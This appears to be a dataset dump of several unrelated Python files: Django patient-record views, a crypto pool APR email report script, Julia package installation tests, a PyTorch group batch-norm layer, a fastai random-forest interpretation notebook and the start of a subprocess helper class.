else:
raise Http404
def addDataEnfermeria(request):
if request.POST:
clave = RepresentsInt(request.POST['clave'])
if clave > 0:
try:
mensaje = "Error al actualizar datos de enfermeria."
paciente = Paciente.objects.get(curp=request.POST['curp'])
dataEnfermeria = PacienteDataEnfermeria.objects.get(id=request.POST['clave'])
dataEnfermeria.peso = request.POST['peso']
dataEnfermeria.talla = request.POST['talla']
dataEnfermeria.f_c = request.POST['fc']
dataEnfermeria.t_a = request.POST['ta']
dataEnfermeria.glucosa = request.POST['gluc']
dataEnfermeria.cintura = request.POST['cintura']
dataEnfermeria.save()
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al actualizar datos de enfermeria."
else:
try:
mensaje = "Error al guardar datos de enfermeria."
paciente = Paciente.objects.get(curp=request.POST['curp'])
u = User.objects.get(username=request.user)
dataEnfermeriaPaciente = PacienteDataEnfermeria.objects.create(
paciente_id = paciente.id,
edad = paciente.edad,
peso = request.POST['peso'],
talla = request.POST['talla'],
f_c = request.POST['fc'],
t_a = request.POST['ta'],
glucosa = request.POST['gluc'],
cintura = request.POST['cintura'],
enfermera_id = u.perfil_usuario.id,
mensaje_informativo = request.POST['mensajeInformativo'],
)
mensaje = "ok"
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al guardar datos de enfermeria."
response = JsonResponse({'isOk' : mensaje})
return HttpResponse(response.content)
else:
raise Http404
def agregar_paciente(request):
if request.is_ajax():
#paciente = Paciente.objects().filter(curp=request.POST['curp'])
try:
mensaje = "Error al crear el parciente"
municipio = "Generico"
u = User.objects.get(username=request.user)
#municipio = Municipio.objects.get(descripcion=request.POST['localidad'])
#estado = Estado.objects.get(descripcion=request.POST['estado'])
pacienteTemp = Paciente.objects.create(
nombre = request.POST['nombre'],
apellidoP = request.POST['apellidoP'],
apellidoM = request.POST['apellidoM'],
curp = request.POST['curp'],
edad = request.POST['edad'],
genero = request.POST['genero'],
fechanacimiento = request.POST['fechaN'],
telefonocasa = request.POST['telCasa'],
telefonocelular = request.POST['celular'],
estadoprocedente_id = request.POST['estado'],
municipio_id = request.POST['municipio'],
localidad = request.POST['localidad'],
calle = request.POST['calle'],
entrecalles = request.POST['entreCalles'],
colonia = request.POST['colonia'],
numerocasa = request.POST['numCasa'],
codigopostal = request.POST['codigoPostal'],
ocupacion_id = request.POST['ocupacion'],
referidopor_id = request.POST['referidopor'],
escolaridad_id = request.POST['escolaridad'],
#correspondio = request.POST[''],
usuariocreacion_id = u.perfil_usuario.id,
)
municipio = pacienteTemp.municipio.descripcion
mensaje = "ok"
except IntegrityError as e:
logger.error(str(e))
mensaje = "La curp del paciente ya existe en la base de datos."
except ValueError as e:
logger.error(str(e))
mensaje = "Valor no valido, revisar los valores que se ingresan."
except:
logger.error(sys.exc_info()[0])
mensaje = "Error al crear el parciente."
response = JsonResponse({'nombre' : request.POST['nombre'],'apellidoP' : request.POST['apellidoP'],
'curp' : request.POST['curp'], 'correspondio' : 'None', 'municipio' : municipio, 'isOk' : mensaje})
return HttpResponse(response.content)
else:
raise Http404
def my_custom_page_not_found_view(request):
render('404.html')
def getUserGroupByRequest(request):
grupo = ""
try:
request.user.groups.get(name='Informacion')
grupo = "informacion"
except Group.DoesNotExist:
try:
request.user.groups.get(name='RevisionMedica')
grupo = "revisionMedica"
except Group.DoesNotExist:
try:
request.user.groups.get(name='RevisionPsicologica')
grupo = "revisionPsicologica"
except Group.DoesNotExist:
try:
request.user.groups.get(name='TrabajoSocial')
grupo = "trabajoSocial"
except Group.DoesNotExist:
try:
request.user.groups.get(name='Imprimir')
grupo = "imprimir"
except Group.DoesNotExist:
try:
request.user.groups.get(name='Enfermeria')
grupo = "enfermeria"
except Group.DoesNotExist:
grupo = ""
return grupo
def RepresentsInt(valor):
try:
value = int(valor)
return value
except ValueError:
return -1 |
12,401 | 0856628754fa14d7744dae0628ea80c27994b89b | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 30 18:25:13 2021
@author: klaus
"""
from prettytable import PrettyTable
import os
from google.cloud import storage
storage_client = storage.Client()
BUCKET_NAME=os.getenv('DATA_BUCKET')
BASE_PATH="/tmp/"
RECIEVER_EMAIL="YOUREMAIL@xyz.xy"
Contracts={
"Yearn-crvDUSD":"0x30FCf7c6cDfC46eC237783D94Fc78553E79d4E9C",
"Yearn-crvUSDN":"0x3B96d491f067912D18563d56858Ba7d6EC67a6fa",
"Yearn-crvBBTC":"0x8fA3A9ecd9EFb07A8CE90A6eb014CF3c0E3B32Ef",
"Yearn-crvOBTC":"0xe9Dc63083c464d6EDcCFf23444fF3CFc6886f6FB",
"CURVE-crvDUSD":"0x8038C01A0390a8c547446a0b2c18fc9aEFEcc10c",
"CURVE-crvUSDN":"0x0f9cb53Ebe405d49A0bbdBD291A65Ff571bC83e1",
"CURVE-crvOBTC":"0xd81dA8D904b52208541Bade1bD6595D8a251F8dd",
"CURVE-crvBBTC":"0x071c661B4DeefB59E2a3DdB20Db036821eeE8F4b",
"Yearn-crvUSDP":"0xC4dAf3b5e2A9e93861c3FBDd25f1e943B8D87417",
"CURVE-crvUSDP":"0x42d7025938bEc20B69cBae5A77421082407f053A",
"Yearn-crvEURS":"0x25212Df29073FfFA7A67399AcEfC2dd75a831A1A",
"CURVE-crvEURS":"0x0Ce6a5fF5217e38315f87032CF90686C96627CAA",
"Yearn-USDC":"0x5f18C75AbDAe578b483E5F43f12a39cF75b973a9",
"Yearn-crvPBTC":"0x3c5DF3077BcF800640B5DAE8c91106575a4826E6",
"CURVE-crvPBTC":"0x7F55DDe206dbAD629C080068923b36fe9D6bDBeF",
"Yearn-crvTBTC":"0x23D3D0f1c697247d5e0a9efB37d8b0ED0C464f7f",
"CURVE-crvTBTC":"0xC25099792E9349C7DD09759744ea681C7de2cb66",
}
def download_blob(bucket_name, source_blob_name, destination_file_name):
"""Downloads a blob from the bucket."""
# bucket_name = "your-bucket-name"
# source_blob_name = "storage-object-name"
# destination_file_name = "local/path/to/file"
bucket = storage_client.bucket(bucket_name)
blobs = storage_client.list_blobs(bucket_name)
for blob in blobs:
print(blob.name)
if (blob.name == source_blob_name):
# Construct a client side representation of a blob.
# Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve
# any content from Google Cloud Storage. As we don't need additional data,
# using `Bucket.blob` is preferred here.
blob = bucket.blob(source_blob_name)
blob.download_to_filename(destination_file_name)
print(
"Blob {} downloaded to {}.".format(
source_blob_name, destination_file_name
)
)
def calc_apr(row_new,row_old,index):
dy=float(row_new.split(",")[2+2*index])-float(row_old.split(",")[2+2*index])
dt=int(row_new.split(",")[0])-int(row_old.split(",")[0])
apr=round(dy/dt*3600*24*365*100,1)
return apr
def get_row_with_age(data,age):
t_now=int(data[-1].split(",")[0])
for k in range(len(data)-1):
print(data[-(1+k)])
if (t_now - int(data[-(1+k)].split(",")[0]) > age):
return data[-(1+k)].split("\n")[0]
print("no row with age of ",age,"found")
return data[1].split("\n")[0]
from datetime import datetime
def create_timestamp_diff(row_new,row_old):
return datetime.utcfromtimestamp(int(row_old.split(",")[0])).strftime('%d.%m.%Y')+"-"+datetime.utcfromtimestamp(int(row_new.split(",")[0])).strftime('%d.%m.%Y')
def create_timestamp_diff_short(row_new,row_old):
return datetime.utcfromtimestamp(int(row_old.split(",")[0])).strftime('%d.%m')+"-"+datetime.utcfromtimestamp(int(row_new.split(",")[0])).strftime('%d.%m')
def get_last_apr():
file='history_apy.csv'
download_blob(BUCKET_NAME, file, BASE_PATH+file)
apy_data=dict()
with open(BASE_PATH+file, 'r') as f:
data=f.readlines()
for n in range(int((len(data[-1].split(","))-1)/2)):
name=data[-1].split(",")[1+2*n]
#if not ("CURVE" in name):
if not ("USDC" in name):
total_row=data[1].split("\n")[0]
last_row=data[-1].split("\n")[0]
month_row=get_row_with_age(data,3600*24*365/12)
bi_week_row=get_row_with_age(data,3600*24*14)
week_row=get_row_with_age(data,3600*24*7)
apr_total=calc_apr(last_row,total_row,n)
time_total=create_timestamp_diff(last_row,total_row)
apr_month=calc_apr(last_row,month_row,n)
time_month=create_timestamp_diff_short(last_row,month_row)
apr_week=calc_apr(last_row,week_row,n)
time_week=create_timestamp_diff_short(last_row,week_row)
apr_biweek=calc_apr(last_row,bi_week_row,n)
time_biweek=create_timestamp_diff_short(last_row,bi_week_row)
apy_data["Time-period"]=[time_week,time_biweek,time_month,time_total]
apy_data[name]=[apr_week,apr_biweek,apr_month,apr_total]
print(apy_data)
apy_data_final=dict()
apy_data_final["Time-period"]=[time_week,time_biweek,time_month,time_total]
for key in apy_data.keys():
if ("Yearn" in key):
yearn_apy=apy_data[key]
curve_key="CURVE-crv"+key.split("crv")[1]
curve_apy=apy_data.get(curve_key,[0,0,0,0])
apy_data_final[key]=list()
for k in range(len(yearn_apy)):
combined_apy=round(((yearn_apy[k]/100+1)*(curve_apy[k]/100+1)-1)*100,1)
apy_data_final[key].append(combined_apy)
print(apy_data_final)
return apy_data_final
def prepare_email(data):
table = PrettyTable()
headline=["Pool-Name","Weekly-[%] ","BiWeekly-[%]", "Monthly-[%]", "Total-APR %"]
table.field_names = headline
#fill table
for pool in data:
row=[pool]+data[pool]
table.add_row(row)
print(table.get_string())
return table.get_string()
def send_email(data):
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib, ssl
port = 587 # For starttls
smtp_server = "smtp.gmail.com"
sender_email = os.getenv('EMAIL_USER')
password=os.getenv('EMAIL_PWD')
receiver_email = [RECIEVER_EMAIL]
table=prepare_email(data)
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, port) as server:
server.starttls(context=context)
server.login(sender_email, password)
for reciever in receiver_email:
message = MIMEMultipart("alternative")
message["Subject"] = "My Crypto update"
message["From"] = sender_email
text=table
part1 = MIMEText(text, "plain")
message.attach(part1)
message["To"] = reciever
server.sendmail(message["From"], message["To"], message.as_string())
def send_apr_data(request):
last_apr=get_last_apr()
send_email(last_apr)
|
12,402 | dda9de04af78c69a873ca9dd91c1dcb577ea9990 | # Copyright (c) 2016-2023 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import pytest
try:
from julia.core import UnsupportedPythonError
except ImportError:
UnsupportedPythonError = Exception
try:
from julia import Main
from julia import Pkg
from julia import Base
julia_installed = True
except (ImportError, RuntimeError, UnsupportedPythonError) as e:
julia_installed = False
try:
import pandaplan.core.pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
@pytest.mark.slow
@pytest.mark.skipif(not julia_installed, reason="requires julia installation")
def test_julia_connection():
try:
import julia
except:
raise ImportError("install pyjulia properlly to run PandaModels.jl")
try:
julia.Julia()
except:
raise UserWarning(
"cannot connect to julia, check pyjulia configuration")
@pytest.mark.slow
@pytest.mark.skipif(not julia_installed, reason="requires julia installation")
# @pytest.mark.dependency(depends=['test_julia_connection'])
def test_pandamodels_installation():
if Base.find_package("PandaModels"):
# remove PandaModels to reinstall it
Pkg.rm("PandaModels")
Pkg.resolve()
else:
logger.info("PandaModels is not installed yet!")
Pkg.Registry.update()
Pkg.add("PandaModels")
Pkg.build()
Pkg.resolve()
logger.info("PandaModels is added to julia packages")
try:
Main.using("PandaModels")
logger.info("using PandaModels in its base mode!")
except ImportError:
raise ImportError("cannot use PandaModels in its base mode")
@pytest.mark.slow
@pytest.mark.skipif(not julia_installed, reason="requires julia installation")
# @pytest.mark.dependency(depends=['test_julia_connection'])
def test_pandamodels_dev_mode():
if Base.find_package("PandaModels"):
# remove PandaModels to reinstall it
Pkg.rm("PandaModels")
Pkg.resolve()
Pkg.Registry.update()
Pkg.add("PandaModels")
logger.info("installing dev mode is a slow process!")
Pkg.resolve()
Pkg.develop("PandaModels")
# add pandamodels dependencies: slow process
Pkg.instantiate()
Pkg.build()
Pkg.resolve()
logger.info("dev mode of PandaModels is added to julia packages")
try:
Pkg.activate("PandaModels")
Main.using("PandaModels")
logger.info("using PandaModels in its dev mode!")
except ImportError:
# assert False
raise ImportError("cannot use PandaModels in its dev mode")
# activate julia base mode
Pkg.activate()
Pkg.free("PandaModels")
Pkg.resolve()
if __name__ == '__main__':
pytest.main([__file__])
|
12,403 | 7abefbd89afe858eaadc427dfa0a81db60216aca | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
class GroupBatchNorm(nn.Module):
def __init__(self, num_features, num_groups=1, num_channels=0, dim=4, eps=1e-5, momentum=0.1, affine=True, mode=0,
*args, **kwargs):
""""""
super(GroupBatchNorm, self).__init__()
if num_channels > 0:
assert num_features % num_channels == 0
num_groups = num_features // num_channels
assert num_features % num_groups == 0
self.num_features = num_features
self.num_groups = num_groups
self.dim = dim
self.eps = eps
self.momentum = momentum
self.affine = affine
self.mode = mode
self.shape = [1] * dim
self.shape[1] = num_features
if self.affine:
self.weight = Parameter(torch.Tensor(*self.shape))
self.bias = Parameter(torch.Tensor(*self.shape))
else:
self.register_parameter('weight', None)
self.register_parameter('bias', None)
self.register_buffer('running_mean', torch.zeros(num_groups))
self.register_buffer('running_var', torch.ones(num_groups))
self.reset_parameters()
def reset_running_stats(self):
self.running_mean.zero_()
self.running_var.fill_(1)
def reset_parameters(self):
self.reset_running_stats()
if self.affine:
nn.init.uniform_(self.weight)
nn.init.zeros_(self.bias)
def forward(self, input: torch.Tensor):
training = self.mode > 0 or (self.mode == 0 and self.training)
assert input.dim() == self.dim and input.size(1) == self.num_features
sizes = input.size()
reshaped = input.view(sizes[0] * sizes[1] // self.num_groups, self.num_groups, *sizes[2:self.dim])
output = F.batch_norm(reshaped, self.running_mean, self.running_var, training=training, momentum=self.momentum,
eps=self.eps)
output = output.view_as(input)
if self.affine:
output = output * self.weight + self.bias
return output
def extra_repr(self):
return '{num_features}, num_groups={num_groups}, eps={eps}, momentum={momentum}, affine={affine}, ' \
'mode={mode}'.format(**self.__dict__)
if __name__ == '__main__':
GBN = GroupBatchNorm(64, 16, momentum=1)
print(GBN)
# print(GBN.weight)
# print(GBN.bias)
x = torch.randn(4, 64, 32, 32) * 2 + 1
print('x mean = {}, var = {}'.format(x.mean(), x.var()))
y = GBN(x)
print('y size = {}, mean = {}, var = {}'.format(y.size(), y.mean(), y.var()))
print(GBN.running_mean, GBN.running_var)
|
12,404 | 65cc60d0acecd6ae9a063548cfa616fcc2a93e4d | # **Important: This notebook will only work with fastai-0.7.x. Do not try to run any fastai-1.x code from this path in the repository because it will load fastai-0.7.x**
# # Random Forest Model interpretation
# %load_ext autoreload
# %autoreload 2
# +
# %matplotlib inline
from fastai.imports import *
from fastai.structured import *
# from pandas_summary import DataFrameSummary
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier
from IPython.display import display
from sklearn import metrics
# -
set_plot_sizes(12,14,16)
# ## Load in our data from last lesson
# +
PATH = "data/bulldozers/"
df_raw = pd.read_feather('tmp/bulldozers-raw')
df_trn, y_trn, nas = proc_df(df_raw, 'SalePrice')
# -
def split_vals(a,n): return a[:n], a[n:]
n_valid = 12000
n_trn = len(df_trn)-n_valid
X_train, X_valid = split_vals(df_trn, n_trn)
y_train, y_valid = split_vals(y_trn, n_trn)
raw_train, raw_valid = split_vals(df_raw, n_trn)
# +
def rmse(x,y): return math.sqrt(((x-y)**2).mean())
def get_scores(m, config=None):
res = {
'config': [config],
'rmse_train': [rmse(m.predict(X_train), y_train)],
'rmse_dev': [rmse(m.predict(X_valid), y_valid)],
'r2_train': [m.score(X_train, y_train)],
'r2_dev': [m.score(X_valid, y_valid)],
'r2_oob': [None],
'n_trees':[m.n_estimators],
'train_size': [len(y_train)],
'dev_size': [len(y_valid)],
}
if hasattr(m, 'oob_score_'): res['r2_oob'][0] = m.oob_score_
return pd.DataFrame(res)
# -
df_raw
# # Confidence based on tree variance
# For model interpretation, there's no need to use the full dataset on each tree - using a subset will be both faster, and also provide better interpretability (since an overfit model will not provide much variance across trees).
set_rf_samples(50000)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
results = get_scores(m, 'baseline-subsample-tuning')
results
# We saw how the model averages predictions across the trees to get an estimate - but how can we know the confidence of the estimate? One simple way is to use the standard deviation of predictions, instead of just the mean. This tells us the *relative* confidence of predictions - that is, for rows where the trees give very different results, you would want to be more cautious of using those results, compared to cases where they are more consistent. Using the same example as in the last lesson when we looked at bagging:
# %time preds = np.stack([t.predict(X_valid) for t in m.estimators_])
np.mean(preds[:,0]), np.std(preds[:,0])
# When we use python to loop through trees like this, we're calculating each in series, which is slow! We can use parallel processing to speed things up:
def get_preds(t): return t.predict(X_valid)
# %time preds = np.stack(parallel_trees(m, get_preds))
np.mean(preds[:,0]), np.std(preds[:,0])
# We can see that different trees are giving different estimates this this auction. In order to see how prediction confidence varies, we can add this into our dataset.
x = raw_valid.copy()
x['pred_std'] = np.std(preds, axis=0)
x['pred'] = np.mean(preds, axis=0)
x.Enclosure.value_counts().plot.barh();
flds = ['Enclosure', 'SalePrice', 'pred', 'pred_std']
enc_summ = x[flds].groupby('Enclosure', as_index=False).mean()
enc_summ
enc_summ = enc_summ[~pd.isnull(enc_summ.SalePrice)]
enc_summ.plot('Enclosure', 'SalePrice', 'barh', xlim=(0,11));
enc_summ.plot('Enclosure', 'pred', 'barh', xerr='pred_std', alpha=0.6, xlim=(0,11));
# *Question*: Why are the predictions nearly exactly right, but the error bars are quite wide?
raw_valid.ProductSize.value_counts().plot.barh();
flds = ['ProductSize', 'SalePrice', 'pred', 'pred_std']
summ = x[flds].groupby(flds[0]).mean()
summ
(summ.pred_std/summ.pred).sort_values(ascending=False)
# # Feature importance
# It's not normally enough to just to know that a model can make accurate predictions - we also want to know *how* it's making predictions. The most important way to see this is with *feature importance*.
fi = rf_feat_importance(m, df_trn); fi[:10]
fi.plot('cols', 'imp', figsize=(10,6), legend=False);
def plot_fi(fi): return fi.plot('cols', 'imp', 'barh', figsize=(12,7), legend=False)
plot_fi(fi[:30]);
to_keep = fi[fi.imp>0.005].cols; len(to_keep)
df_keep = df_trn[to_keep].copy()
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5,
n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'fi')
tmp
results = pd.concat([tmp, results])
results[::-1]
fi = rf_feat_importance(m, df_keep)
plot_fi(fi);
# ## One-hot encoding
# proc_df's optional *max_n_cat* argument will turn some categorical variables into new columns.
#
# For example, the column **ProductSize** which has 6 categories:
#
# * Large
# * Large / Medium
# * Medium
# * Compact
# * Small
# * Mini
#
# gets turned into 6 new columns:
#
# * ProductSize_Large
# * ProductSize_Large / Medium
# * ProductSize_Medium
# * ProductSize_Compact
# * ProductSize_Small
# * ProductSize_Mini
#
# and the column **ProductSize** gets removed.
#
# It will only happen to columns whose number of categories is no bigger than the value of the *max_n_cat* argument.
#
# Now some of these new columns may prove to have more important features than in the earlier situation, where all categories were in one column.
# +
df_trn2, y_trn, nas = proc_df(df_raw, 'SalePrice', max_n_cat=7)
X_train, X_valid = split_vals(df_trn2, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.6, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
# -
tmp = get_scores(m, 'one-hot')
tmp
results = pd.concat([tmp, results])
results[::-1]
fi = rf_feat_importance(m, df_trn2)
plot_fi(fi[:25]);
# # Removing redundant features
# One thing that makes this harder to interpret is that there seem to be some variables with very similar meanings. Let's try to remove redundent features.
from scipy.cluster import hierarchy as hc
corr = np.round(scipy.stats.spearmanr(df_keep).correlation, 4)
corr_condensed = hc.distance.squareform(1-corr)
z = hc.linkage(corr_condensed, method='average')
fig = plt.figure(figsize=(16,10))
dendrogram = hc.dendrogram(z, labels=df_keep.columns, orientation='left', leaf_font_size=16)
plt.show()
sorted(list(df_keep.columns))
len(corr), len(corr[0])
# Let's try removing some of these related features to see if the model can be simplified without impacting the accuracy.
def get_oob(df):
m = RandomForestRegressor(n_estimators=30, min_samples_leaf=5, max_features=0.6, n_jobs=-1, oob_score=True)
x, _ = split_vals(df, n_trn)
m.fit(x, y_train)
return m.oob_score_
# Here's our baseline.
get_oob(df_keep)
# Now we try removing each variable one at a time.
for c in ('saleYear', 'saleElapsed', 'fiModelDesc', 'fiBaseModel', 'Grouser_Tracks', 'Coupler_System'):
print(c, get_oob(df_keep.drop(c, axis=1)))
# It looks like we can try one from each group for removal. Let's see what that does.
to_drop = ['saleYear', 'fiBaseModel', 'Grouser_Tracks']
get_oob(df_keep.drop(to_drop, axis=1))
# Looking good! Let's use this dataframe from here. We'll save the list of columns so we can reuse it later.
df_keep.drop(to_drop, axis=1, inplace=True)
X_train, X_valid = split_vals(df_keep, n_trn)
# +
# np.save('tmp/keep_cols.npy', np.array(df_keep.columns))
# -
# keep_cols = np.load('tmp/keep_cols.npy')
# df_keep = df_trn[keep_cols]
keep_cols = df_keep.columns
sorted(list(keep_cols))
# And let's see how this model looks on the full dataset.
reset_rf_samples()
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'baseline-slow-dedup')
tmp
results = pd.concat([tmp, results])
results[::-1]
# # Partial dependence
from pdpbox import pdp
from plotnine import *
set_rf_samples(50000)
# This next analysis will be a little easier if we use the 1-hot encoded categorical variables, so let's load them up again.
df_trn2, y_trn, nas = proc_df(df_raw, 'SalePrice', max_n_cat=7)
X_train, X_valid = split_vals(df_trn2, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.6, n_jobs=-1)
m.fit(X_train, y_train);
plot_fi(rf_feat_importance(m, df_trn2)[:10]);
df_raw.plot('YearMade', 'saleElapsed', 'scatter', alpha=0.01, figsize=(10,8));
x_all = get_sample(df_raw[df_raw.YearMade>1930], 500)
ggplot(x_all, aes('YearMade', 'SalePrice'))+stat_smooth(se=True, method='loess')
x = get_sample(X_train[X_train.YearMade>1930], 500)
def plot_pdp_old(feat, clusters=None, feat_name=None):
feat_name = feat_name or feat
p = pdp.pdp_isolate(m, x, feat)
return pdp.pdp_plot(p, feat_name, plot_lines=True,
cluster=clusters is not None,
n_cluster_centers=clusters)
def plot_pdp(feat, clusters = None, feat_name = None):
feat_name = feat_name or feat
p = pdp.pdp_isolate(m, x, feature = feat, model_features = x.columns)
return pdp.pdp_plot(p, feat_name, plot_lines = True,
cluster = clusters is not None,
n_cluster_centers = clusters)
plot_pdp('YearMade')
plot_pdp('YearMade', clusters=5)
sorted(list(x.columns))
try:
feats = ['saleElapsed', 'YearMade']
p = pdp.pdp_interact(m, x, x.columns, feats)
pdp.pdp_interact_plot(p, feats)
except:
print("ignore errors")
plot_pdp(['Enclosure_EROPS w AC', 'Enclosure_EROPS', 'Enclosure_OROPS'], 5, 'Enclosure')
df_raw.YearMade[df_raw.YearMade<1950] = 1950
df_keep['age'] = df_raw['age'] = df_raw.saleYear-df_raw.YearMade
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.6, n_jobs=-1)
m.fit(X_train, y_train)
plot_fi(rf_feat_importance(m, df_keep));
# # Tree interpreter
from treeinterpreter import treeinterpreter as ti
df_train, df_valid = split_vals(df_raw[df_keep.columns], n_trn)
row = X_valid.values[None,0]; row
prediction, bias, contributions = ti.predict(m, row)
prediction[0], bias[0]
idxs = np.argsort(contributions[0])
pd.concat(
[pd.DataFrame(contributions[0]),
pd.DataFrame(contributions[0][idxs]),
pd.DataFrame(idxs)],
axis=1
)
[o for o in zip(df_keep.columns[idxs], df_valid.iloc[0][idxs], contributions[0][idxs])]
contributions[0].sum(), bias[0], contributions[0].sum() + bias[0], prediction[0]
# # Extrapolation
df_ext = df_keep.copy()
df_ext['is_valid'] = 1
df_ext.is_valid[:n_trn] = 0
x, y, nas = proc_df(df_ext, 'is_valid')
m = RandomForestClassifier(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(x, y);
m.oob_score_
fi = rf_feat_importance(m, x); fi[:10]
feats=['SalesID', 'saleElapsed', 'MachineID']
(X_train[feats]/1000).describe()
(X_valid[feats]/1000).describe()
x.drop(feats, axis=1, inplace=True)
m = RandomForestClassifier(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(x, y);
m.oob_score_
fi = rf_feat_importance(m, x); fi[:10]
feats=['age', 'YearMade', 'saleDayofyear']
(X_train[feats]).describe()
(X_valid[feats]).describe()
set_rf_samples(50000)
feats=['SalesID', 'saleElapsed', 'MachineID',
'age', 'YearMade', 'saleDayofyear']
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
get_scores(m, '')
for f in feats:
df_subs = df_keep.drop(f, axis=1)
X_train, X_valid = split_vals(df_subs, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
print(f)
display(get_scores(m, ''))
# +
# reset_rf_samples()
# +
# for comparison
# -
X_train, X_valid = split_vals(df_keep, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'before-remove')
tmp
results = pd.concat([tmp, results])
results[::-1]
df_subs = df_keep.drop(['SalesID', 'MachineID', 'saleDayofyear'], axis=1)
X_train, X_valid = split_vals(df_subs, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'after-remove')
tmp
results = pd.concat([tmp, results])
results[::-1]
reset_rf_samples()
df_subs = df_keep.drop(['SalesID', 'MachineID', 'saleDayofyear'], axis=1)
X_train, X_valid = split_vals(df_subs, n_trn)
m = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features=0.5, n_jobs=-1, oob_score=True)
m.fit(X_train, y_train)
tmp = get_scores(m, 'full')
tmp
results = pd.concat([tmp, results])
results[::-1]
plot_fi(rf_feat_importance(m, X_train));
np.save('tmp/subs_cols.npy', np.array(df_subs.columns))
# # Our final model!
m = RandomForestRegressor(n_estimators=160, max_features=0.5, n_jobs=-1, oob_score=True)
# %time m.fit(X_train, y_train)
get_scores(m, "final")
tmp = get_scores(m, "final")
tmp
results = pd.concat([tmp, results])
results[::-1]
cols = results.columns[:6]
results[cols].plot.barh(
x='config',
subplots=True,
# rot=90,
# ylim=(0,1),
# title=['']*4,
legend=False,
figsize=(8,3*results.shape[0])
);
|
12,405 | 3feac9e2d42d6c9f5868bd8146b96157369193f7 | # coding=utf-8
#
# Copyright (C) 2013 Allis Tauri <allista@gmail.com>
#
# DegenPrimerGUI is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DegenPrimerGUI is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on Nov 10, 2013
@author: Allis Tauri <allista@gmail.com>
'''
import os
import sys
import abc
import signal
import argparse
import traceback
import multiprocessing.connection as mpc
import BioUtils.Tools.tmpStorage as tmpStorage
from BioUtils.Tools.UMP import ignore_interrupt
from multiprocessing.managers import SyncManager
from threading import Thread
from time import sleep
class SignalListener(Thread):
def __init__(self, connection, event, sig='ABORT'):
Thread.__init__(self)
self.daemon = 1
self._con = connection
self._event = event
self._signal = sig
#end def
def _handle_signal(self):
sig = self._con.recv()
if sig == self._signal:
self._event.set()
#end def
def run(self):
try: self._handle_signal()
except (KeyboardInterrupt, EOFError, IOError): pass
except Exception: traceback.print_exc()
#end def
#end class
class StreamEncoder(object):
encoding = 'UTF-8'
def __init__(self, stream):
self._stream = stream
def write(self, text):
encoded = unicode(text).encode(self.encoding)
self._stream.write(encoded)
def flush(self):
self._stream.flush()
def isatty(self):
return self._stream.isatty()
#end class
class SubprocessBase(object):
'''Base class for subprocess routines that use socket connection'''
__metaclass__ = abc.ABCMeta
_error_msg = ('This executable should only be called from '
'inside the main program.')
def __init__(self):
self._pid = os.getpid()
#abort event
self._mgr = SyncManager()
self._mgr.start(ignore_interrupt)
self._abort_event = self._mgr.Event()
#stdout/err
self._err = StreamEncoder(sys.stderr)
self._out = StreamEncoder(sys.stdout)
#connection information
self._port = None
self._con = None
self()
#end def
def __del__(self):
if self._con is not None:
self.terminate()
self._con.close()
self._mgr.shutdown()
#end def
def _check_tty(self):
if sys.stdin.isatty():
self._err.write(self._error_msg+'\n')
return True
return False
#end def
def _sig_handler(self, signal, frame):
if self._pid != os.getpid(): return
self._out.write('%d aborting...\n'%os.getpid())
self._abort_event.set(); sleep(0.1)
tmpStorage.clean_tmp_files()
#end def
def _set_sig_handlers(self):
signal.signal(signal.SIGINT, self._sig_handler)
signal.signal(signal.SIGTERM, self._sig_handler)
signal.signal(signal.SIGQUIT, self._sig_handler)
#end def
def _parse_args(self):
parser = argparse.ArgumentParser(self._error_msg)
conf_group = parser.add_argument_group('Preset configuration')
conf_group.add_argument('port', metavar='number',
type=int, nargs=1,
